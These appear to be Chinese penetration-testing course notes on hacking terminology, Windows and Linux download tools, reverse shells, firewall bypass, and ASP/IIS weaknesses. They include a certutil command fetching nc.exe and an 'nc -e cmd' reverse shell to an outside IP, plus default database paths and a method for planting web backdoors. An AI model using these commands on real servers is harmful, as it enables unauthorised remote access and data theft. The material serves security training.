知识点

  1. 名词解释-渗透测试-漏洞&攻击&后门&代码&专业词
  2. 必备技能-操作系统-用途&命令&权限&用户&防火墙
  3. 必备技能-文件下载-缘由&场景&使用-提权&后渗透
  4. 必备技能-反弹命令-缘由&场景&使用-提权&后渗透

前后端,POC/EXP,Payload/Shellcode,后门/Webshell,木马/病毒, 反弹,回显,跳板,黑白盒测试,暴力破解,社会工程学,撞库,ATT&CK 等
参考:
https://www.cnblogs.com/sunny11/p/13583083.html
https://forum.ywhack.com/bountytips.php?download
https://forum.ywhack.com/reverse-shell/
https://blog.csdn.net/weixin_43303273/article/details/83029138

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#基础案例 1:操作系统-用途&命令&权限&用户&防火墙 
1、个人计算机&服务器用机
2、Windows&Linux 常见命令
3、文件权限&服务权限&用户权限等
4、系统用户&用户组&服务用户等分类
5、自带防火墙出站&入站规则策略协议

#实用案例 1:文件上传下载-解决无图形化&解决数据传输
Linux:wget curl python ruby perl java 等
Windows:PowerShell Certutil Bitsadmin msiexec mshta rundll32 等

#实用案例 2:反弹 Shell 命令-解决数据回显&解决数据通讯 useradd 用户名 passwd 用户名 测试 Linux 系统添加用户或修改密码命令交互回显问题

#结合案例 1:防火墙绕过-正向连接&反向连接&内网服务器
1、内网:
内网 -> xiaodi8
xiaodi8 !-> 内网
2、防火墙:
xiaodi8 <-> aliyun
xiaodi8 防火墙 -> aliyun
aliyun !-> xiaodi8 防火墙

#结合案例 2:学会了有手就行-Fofa 拿下同行 Pikachu 服务器 文件下载&反弹 Shell:
certutil -urlcache -split -f http://www.xiaodi8.com/nc.exe
nc.exe nc -e cmd 47.75.212.155 5566

asp程序的数据库下载植入
一般asp程序都会使用经典套件,当使用access数据库时,一般后缀名都是
db.asp(可解析) dh.asa db.mdb(可下载)
当数据库文件是 mdb格式文件时,可以直接访问数据库文件,然后本地就会下载该数据库,使用数据库工具打开即可获得所有数据库信息

ASP-数据库-MDB 默认下载

/database/powereasy2006.mdb 默认下载路径
/admin/Admin_Login.asp 后台

ASP-数据库-ASP 后门植入连接

当数据库文件是 asp格式时,可以找到相应的可以在数据交互的地方,如留言板,文件上传等功能点,插入后门代码。使用一句话连接工具 菜刀/蚁剑等工具直接连接数据库文件即可解析后门。

ASP-中间件-IIS 短文件名探针-安全漏洞

这是IIS目前通用的漏洞。只需要使用脚本即可探针到网站目录,与常规的
目录扫描工具是不同点在于,目录爆破工具是通过现有的字典跑文件或文
件夹名,但是IIS的短文件名探针时IIS中间件的漏洞。但是局限性也很大,
只能探针六位长度的文件或文件夹。

ASP-中间件-IIS 文件上传解析-安全漏洞

ASP-中间件-IIS 配置目录读写-安全配置

当管理人员出现配置错误之时候,属性的主目录下权限给予了写入且web服务拓展允许了webDAV时